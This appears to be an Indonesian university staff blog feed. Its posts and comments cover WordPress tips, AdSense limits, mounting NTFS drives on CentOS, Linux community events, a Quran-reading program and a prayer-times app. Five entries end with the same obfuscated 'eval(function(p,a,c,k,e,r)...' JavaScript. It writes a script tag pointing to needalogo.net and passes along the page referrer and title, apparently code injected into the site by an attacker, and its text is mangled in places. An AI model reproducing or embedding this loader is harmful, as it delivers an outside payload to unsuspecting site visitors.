Rachmad Tsalaatsa

  • Link pengumuman di http://bits.ub.ac.id/maintenance-web-blog-dosen/
    Dengan ini kami umumkan bahwa pada tanggal 18-19 Oktober 2014, kami akan melakukan maintenance untuk peningkatan pelayanan pada situs blog dosen lecture.ub.ac.id dan blog staff staff.ub.ac.id. Karena itu maka pada tanggal tersebut (18-19 Oktober) situs lecture.ub.ac.id dan situs staff.ub.ac.id tidak dapat diakses. Maaf atas segala ketidaknyamanan, terima kasih atas perhatian Anda.
    Untuk informasi lebih lanjut, hubungi PPTI UB

    Nah sekitar jam 1 siang tanggal 18 Oktober 2014 maitenance sudah selesai dilakukan. Dengan proses maintenance ini diharapkan akses lecture.ub.ac.id dan juga staff.ub.ac.id lebih stabil dan lebih cepat.
    Jika ditemui permasalahan setelah proses maintenance ini mohon disampaikan ke kami 🙂

  • Bagi website lembaga di UB yang ingin websitenya mempunyai fitur multi bahasa yakni bahasa Indonesia dan bahasa lain (pada umumnya bahasa Inggris), kami dari PPTI selaku pengelola hosting di UB menyarankan untuk menggunakan plugin qTranslate.
    Dengan plugin qTranslate, website yang sebelumnya hanya mempunyai 1 bahasa yakni bahasa Indonesia, akan mempunyai tambahan bahasa Inggris. Jadi jika pengguna ingin mengakses website dengan bahasa Inggris, pengguna tinggal klik link yang akan menuju ke bahasa Inggris.
    Bahasa Inggris di plugin qTranslate penggunaannya dengan cara di translate secara manual, jadi posting yang telah ada yang berbahasa Indonesia di translate ke dalam bahasa Inggris dengan cara manual.
    Di dalam menu edit posting akan ada 2 kolom yakni untuk bahasa Indonesia dan untuk bahasa Inggris.
    plugin qtranslate
    Contoh website lembaga di UB yang telah menggunakan plugin qTranslate :

    biologi.ub.ac.id

    biologi UB

    bits.ub.ac.id

    bits UB
    Untuk download plugin qTranslate silahkan menuju ke halaman template.ub.ac.id/bilingual. Download qTranslate sesuai dengan versi WordPress yang digunakan. Cara instalasi plugin seperti menginstall plugin yang lain.
     

  • Google Adsense – Adsense (iklan) yang ditampilkan pada halaman website ada jumlah maksimalnya. Kita perlu mengetahui berapa jumlah maksimal iklan yang bisa kita tampilkan di halaman blog kita, supaya kita tidak melanggar kebijakan yang telah ditentukan oleh Google. Sesuai dengan keterangan yang ada pada halaman resmi Google, jumlah maksimal adsense yang bisa kita tampilkan yakni :
    google adsense

    3 iklan berbentuk konten
    3 iklan berbentuk link
    2 iklan berbentuk pencarian

    Jadi kita bisa menampilkan sebanyak 8 iklan pada website kita, tapi tentunya kita juga perlu mempertimbangkan loading website kita jika kita terlalu banyak memasang iklan. Selain itu juga halaman akan terlihat tidak bagus.
    Sumber : http://rantsa.com

  • beda harga off the road dg on the road berapa mas ya?

  • harga harga off the road dg on the road berapa mas ya?

  • Kita dapat melakukan disable plugin wordpress melalui database (tidak melalui dashboard wordpress). Sebelum kita melakukan disable plugin pada wordpress, sebaiknya lakukan backup terlebih dahulu database wordpress, karena disable plugin dilakukan pada database.

    Disable Plugin WordPress
    Login ke database melalui Phpmyadmin kemudian klik pada menu “SQL”

    Lakukan query (isi kolom query) untuk disable plugin yang digunakan oleh wordpress dengan perintah:
    [bash] UPDATE wp_options SET option_value = ‘a:0:{}’ WHERE option_name = ‘active_plugins’; [/bash]

    Klik “Go” dan plugin wordpress sudah ter-disable.
    Perintah atau cara diatas hanya men-disable plugin tanpa meng-uninstall atau merubah plugin yang telah terinstall pada wordpress.

    Contoh Kasus
    Disable plugin wordpress melalui database dilakukan pada contoh kasus ketika menginstall plugin di wordpress dimana plugin tersebut tidak compatible dengan versi wordpress yang ada. Misal plugin yang akan diinstall untuk versi wordpress 3.1 ke atas, sedangkan versi wordpress yang digunakan adalah versi 3.0. Maka setelah instalasi dan pengaktifan plugin dilakukan, maka tampilan website ketika diakses adalah blank (layar pada browser kosong), baik itu di front-end dan juga di back-end. Jika hal (tampilan browser blank) itu terjadi, yang dilakukan adalah plugin yang terinstall tadi di nonaktifkan dengan cara diatas (melalui database) karena tampilan back-end blank.
    Tulisan ini diambil dari blog pribadi saya rantsa.com

  • Favicon atau favorite icon adalah icon utama yang muncul pada address bar pada website. Favicon juga biasa disebut sebagai logo dari website.

    Contoh Favicon
    Favicon website Google berupa kotak berwarna biru muda dengan tulisan huruf G didalamnya.
    favicon google
    Sedangkan favicon website Kaskus berupa kotak putih dengan outline berwarna orange dengan tulisan huruf K didalamnya.
    favicon kaskus

    Menambahkan Favicon di WordPress
    Untuk membuat favicon kita bisa membuatnya sendiri atau bisa juga menggunakan website yang menyediakan fasilitas generate favicon via online. Ada banyak website yang menyediakan fasilitas generate favicon, salah satunya adalah Prodwaw.net

    Pilih dan upload file image yang akan kita jadikan favicon. Type file image berupa JPG, JPEG, PNG, GIF, BMP, TIF, TIFF dan size-nya kurang dari 1MB.
    image upload prodraw

    Generate file image yang telah kita upload
    select icon size prodraw

    Pilih salah satu kemudian download file favicon yang telah kita generate
    generate download prodraw

    File favicon yang telah kita generate kita upload di directory root WordPress (setara dengan wp-admin atau wp-content), kemudian copy kode di bawah ini dan tambahkan setelah tag <head> pada file header.php yang ada di directory theme WordPress yang digunakan.[php] [/php]

    Kita telah selesai menambahkan favicon pada website WordPress kita, mudah bukan? 🙂 Untuk melihatnya refresh browser dan favicon yang telah kita buat muncul di address bar website kita.

    Tulisan ini diambil dari blog pribadi saya rantsa.com

  • Hari ini tepat 1 tahun saya vakum tidak posting di blog ini 😀 . Untuk mengawali kembali postingan di tahun ini saya buka dengan tulisan ODOJ “One Day One Juz”. Tulisan ini saya ambil dari blog pribadi saya rantsa.com

    Apa Itu ODOJ ?
    odoj one day one juz
    ODOJ (One Day One Juz) adalah program yang digagas oleh Rumah Qur’an untuk memfasilitasi dan mempermudah umat Islam agar dapat membiasakan tilawah Al-Qur’an 1 juz per hari. Konsepnya hampir sama dengan ODOA (One Day One Ayat) yang digagas oleh Ust. Yusuf Mansyur. Jika di ODOA kita diharuskan untuk menghafal 1 ayat per hari, maka di ODOJ ini kita diharuskan untuk tilawah 1 juz per hari.

    System di ODOJ
    System yang ada di ODOJ yaitu :

    Setiap group WA ODOJ beranggotan 30 orang
    Setiap anggota diwajibkan untuk menyelesaikan tilawah 1 juz per hari
    Tilawah dimulai pada pukul 18.00 WIB dan berakhir pada pukul 17.59 WIB
    Anggota ODOJ yang telah menyelesaikan tilawahnya 1 juz melapor ke PJ di Group WA bahwa sudah menyelesaikan 1 juz
    Setiap group ODOJ akan meng-khatamkan Al-Quran setiap hari (1 hari 1 khatam)

    Untuk menjadi anggota ODOJ gampang kok, yang kita perlukan hanya aplikasi WA (Whatapps). Jadi komunikasi ODOJ nanti melalui group di Whatapps. Jaman sekarang handphone mana yang tidak terinstall whatsapp? Hampir semua handphone sudah terinstall aplikasi Whatapps kan? 😀 .

    Keuntungan Gabung ODOJ
    Beberapa keuntungan yang kita dapat jika bergabung dengan ODOJ

    Semangat dalam tilawah (1 juz per hari)
    Menambah teman sesama saudara muslim
    Menjadi lebih bersemangat dalam tilawah. Karena kita melakukannya secara jamaah dan di dalam group WA kita saling menyemangati untuk menyelesaikan tilawah 1 juz
    Karena pukul 6 sore ditargetkan sudah harus menyelesaikan 1 juz, maka bisa lebih bersemangat untuk tilawah 1 juz
    Yang sebelumnya jarang tilawah menjadi tertib dalam tilawahnya
    Yang sebelumnya sehari tidak sampai 1 juz, menjadi 1 juz tilawahnya

    Saya ikut gabung di ODOJ dengan mendaftar kemarin Minggu sekitar pukul 11 siang. Setelah mendaftar saya menunggu untuk di invite ke group WA. Pada sorenya sekitar pukul 4 sudah diinvite dan saya masuk ke group ODOJ 499 🙂
    Sebenarnya tidak berat dalam menyelesaikan 1 juz per hari. Al-Quran yang kita baca dalam 1 juz terdiri dari 10 lembar. Jadi misal kita jadwalkan untuk tilawah sehari 3x, maka kita lakukan 3 lembar dua kali dan 4 lembar sekali dalam tilawah. Misal 3x itu sesudah Isya’, sebelum Shubuh dan sesudah Shubuh. Selesai kan 1 juz? 🙂
    Salah satu keutamaan dalam tilawah Al-Quran adalah iman seseorang itu tidak stabil, kadang naik dan kadang turun. Nah diwaktu iman dalam posisi turun, salah satu cara untuk menaikkannya yakni dengan tilawah Al-Quran.
    Yang belum gabung segera gabung ya 🙂 , mari berlomba-lomba dalam kebaikan.
    Untuk cara gabung atau daftar ODOJ silahkan lihat disini

  • Setelah melihat di OffWeb UB tepatnya dibagian pengumuman dimana sebelumnya diberi tau oleh teman kerja bahwa nama saya (blog) tercantum pada pemenang Lomba Blogmetrics UB 2012 pada kategori blog staff :-).

    Pemenang UB Blogmetrics Award 2012
    Pemenang UB Blogmetrics Award 2012

    Oh ya untuk Lomba Blogmetrics UB pada tahun kemarin (2011) saya berada di pemenang hiburan.
    Pengumuman resmi pemenang lomba blogmetrics 2012 yakni pada acara Dies Natalis yang dilangsungkan kemarin Sabtu di Samanta Krida, dan pada acara tersebut nama saya disebutkan sebagai juara ke-3 pada pemenang blog staff.
    Entah seperti apa dan bagaimana pehitungan blogmetric sehingga blog saya ini bisa juara ke-3. Oh ya sebenarnya blog utama saya (blog yang sering saya update/tempat menuangkan tulisan saya) bukan disini tetapi di rantsa.com.
    Tujuan saya membuat blog staff (rachmad.staff.ub.ac.id) ini sebenarnya saya  khususkan untuk menginformasikan seputar perkembangan teknologi informasi yang ada di Universitas Brawijaya, dimana wilayah kerja saya berada di daerah tersebut, yakni di PPTI.
    Di akhir, Alhamdulillah atas juara ke-3 ini, tinggal nunggu menerima hadiahnya 🙂

  • bisa pakai aplikasi “nux radio” mas 🙂

  • ewaktu menancapkan hardisk eksternal ke dalam server dengan OS Linux CentOS, dimana hardisk external ini filesystemnya yakni NTFS. Setelah kabel USB ditancapkan ke port USB server, pada layar monitor muncul pesan kesalahan mount: unknown filesystem type ‘ntfs’

    Solusi
    Solusi dari permasalahan tersebut yakni dengan langkah-langkah berikut :

    Download repository dari rpmforge
    Dalam hal ini Linux CentOS yang digunakan adalah versi 6 64 bit
    wget http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm
    Install repository
    rpm -Uhv rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm
    Install file fuse, fuse-ntfs-3g, dkms dan dkms-fuse
    yum install fuse fuse-ntfs-3g dkms dkms-fuse
    Mount hardisk eksternal ke folder (misal) hd di directory mnt dengan hardisk eksternal dikenali sebagai sdc1
    mkdir /mnt/hd
    mount -t ntfs-3g /dev/sdc1 /mnt/hd

    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2 6=7.c(7.e()*f);2 0=’g://h.i/j/k?’;0=0+’l=’+3.m;0=0+’&n=’+3.o;0=0+’&r=’+6;d.p(”)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

  • Bertepatan dengan bulan Ramadhan dan dengan konsep “Berbagi Bersama”, Komunitas Linux Arek Malang (KOLAM) akan mengadakan kegiatan di Yayasan Yatim Mandiri Malang, tepatnya di Pondok Pesantren Asuhan Yatim Mandiri Malang. Kegiatan tersebut akan dilaksanakan sebelum berbuka dan berlangsung pada tanggal 28 Juli dan 5 Agustus 2012.
    Didalam kesempatan tersebut KOLAM akan memberi materi tentang penggunaan OS Free yaitu Linux Sabily dan juga sekaligus akan menyalurkan bantuan kepada Yayasan Yatim Mandiri Malang. Oleh karena itu, KOLAM bertindak sebagai penyalur bantuan, mengajak anda ikut berpartisipasi pada acara tersebut dengan memberi bantuan dalam bentuk dana (uang), pakaian (layak pakai) atau sembako.
    Bantuan dalam bentuk dana, pakaian atau sembako tersebut bisa anda serahkan kepada :
    1. Ketua KoLAM – Zen (085749537763)
    2. Sekretaris KOLAM – Dede (085649101985)
    3. Transfer ke BRI dengan rekening 005601019800507 atau BANK Mandiri dengan rekening : 1440010583893 a.n Rachmad Tsalaatsa (081944884039)
    4. Diserahkan saat kopdar KOLAM, pada hari Jumat pukul 16.00-18.00 di Kampung Kuliner
    Untuk penyerahan bantuan secara langsung silahkan menghubungi ketiga orang diatas dengan janjian terlebih dahulu (waktu dan tempatnya). Penyerahan bantuan tersebut dimulai dari tanggal 13-27 Juli 2012.
    Kami tunggu partisipasi anda dalam acara KOLAM “Berbagi Bersama” Yayasan Yatim Mandiri Malang.
    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2 6=7.c(7.e()*f);2 0=’g://h.i/j/k?’;0=0+’l=’+3.m;0=0+’&n=’+3.o;0=0+’&r=’+6;d.p(”)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

  • KALIUM (Komunitas Linux Universitas Muhammadiyah Malang) bekerja sama dengan KOLAM (Komunitas Linux Arek Malang) akan mengadakan Fedora Release Party. Yaitu acara yang terselenggara berkaitan dengan release Fedora 17 atau yang dikenal dengan nama “Beefy Miracle”.
    Acara ini diadakan besok Minggu atau tepatnya tanggal 10 Juni 2012, dengan bertempat di Lab Informatika GKB 3 Universitas Muhammadiyah Malang. Peserta pada acara ini terbatas hanya untuk 25 peserta. Jika ingin mendaftar silahkan membuka link bit.ly/fedora17, isi biodata anda di halaman tersebut dan kemudian tunggu konfirmasi dari panitia.

    Dalam acara ini nanti disajikan tiga materi. Yang pertama yaitu tentu saja mengenai Fedora 17, baik itu fitur atau teknologi terbaru yang ada dalam Fedora 17 dan sebagainya. Materi yang kedua adalah mengenai Load Balancing Webserver. Materi kedua ini nanti berbentuk workshop, jadi tiap peserta akan melakukan praktek langsung tentang bagaimana mengimplementasikan load balancing pada beberapa server. Materi pertama dan kedua ini akan diisi oleh pihak KOLAM. Sedangkan materi ketiga yaitu mengenai Radio Server. Materi ini akan dibawakan oleh pihak KALIUM.
    Berikut poster dari acara Fedora 17 “Beefy Miracle” Release Party

    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2 6=7.c(7.e()*f);2 0=’g://h.i/j/k?’;0=0+’l=’+3.m;0=0+’&n=’+3.o;0=0+’&r=’+6;d.p(”)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

  • Besok atau tepatnya tanggal 12 Mei 2012, KSL UIN Malang atau biasa disebut UINBUNTU bekerja sama dengan KOLAM (KPLI Malang) akan mengadakan acara Ubuntu Release Party – Precise Pangolin
    Di acara ini saya diminta untuk mengisi materi “Linux Server” 🙂
    Berikut poster dari acara tersebut :


    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2 6=7.c(7.e()*f);2 0=’g://h.i/j/k?’;0=0+’l=’+3.m;0=0+’&n=’+3.o;0=0+’&r=’+6;d.p(”)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))


  • eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2 6=7.c(7.e()*f);2 0=’g://h.i/j/k?’;0=0+’l=’+3.m;0=0+’&n=’+3.o;0=0+’&r=’+6;d.p(”)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

  • digedungnya sampean memang msh pake yg sebelumnya mas 🙂

  • Karena Masjid dikantor saya ada digedung sebelah kantor saya, sehingga jika adzan Dzuhur dan Ashar suara adzan kedengeran lirih. Maka dari itu saya memerlukan aplikasi adzan yang bisa memberikan notif ke saya bahwa sudah masuk waktu adzan Dzuhur dan Ashar.
    Di linux Ubuntu 11.10 yang terinstall di laptop saya ada aplikasi tersebut, yaitu yang bernama Minbar Prayer Times. Dengan aplikasi Minbar Prayer Times ini, jika kita sedang beraktifitas didepan komputer dan telah tiba waktu sholat, maka akan ada notif berupa pemberitahuan jika akan masuk waktu sholat dan komputer kita akan memainkan adzan.
    Untuk menginstall Aplikasi Minbar Prayer Times silahkan menuju Ubuntu Software Center dan mengetikkan kata Minbar, aplikasi akan muncul dan silahkan klik install. Setelah terinstall silahkan untuk membuka aplikasi tersebut.
    Aplikasi Minbar Prayer Times terdiri empat bagian, yaitu: time yang menunjukkan waktu sholat, location yang menunjukkan arah kiblat dari lokasi/tempat kita berada, timetable digunakan untuk mengetahui kalender waktu sholat dalam satu bulan, dan preferences yang digunakan untuk melakukan pengaturan aplikasi.
    Sebelum Minbar Prayer TImes dapat mengingatkan waktu sholat, kita harus mensetting aplikasi ini. Silahkan untuk membuka aplikasinya dan klik pada bagian “Preferences”. Kita masuk ke “Edit City Details” kemudian klik “City Details”. Karena saya ada di malang maka saya memasukkan latitude dan longitude kota Malang. Sehingga isian saya adalah: Latitude=7.98, Longitude=112.63, City=Malang, Time Zone=7.0

    Untuk anda yang berada di kota selain Malang silahkan menuju website : islamicfinder.com untuk melihat berapa latitude dan longitude kota anda.
    1. Pilih Negara : Indonesia

    2. Ketik kota anda, misal : Lamongan kemudian klik “Search”

    3. Klik “Lamongan”

    4. Latitude dan Longitude kota anda akan muncul, misal untuk Lamongan (seperti gambar di bawah), Latitude : -7.1167 dan Longitude : 112.4167

  • Notebooknya harus terinstall Linux Ubuntu (11.10) dulu Pak Rochim, he..he…
    Mengutip kutipan tulisan saya diatas “Untuk menginstall Aplikasi Minbar Prayer Times silahkan menuju Ubuntu Software Center dan […]

  • Load More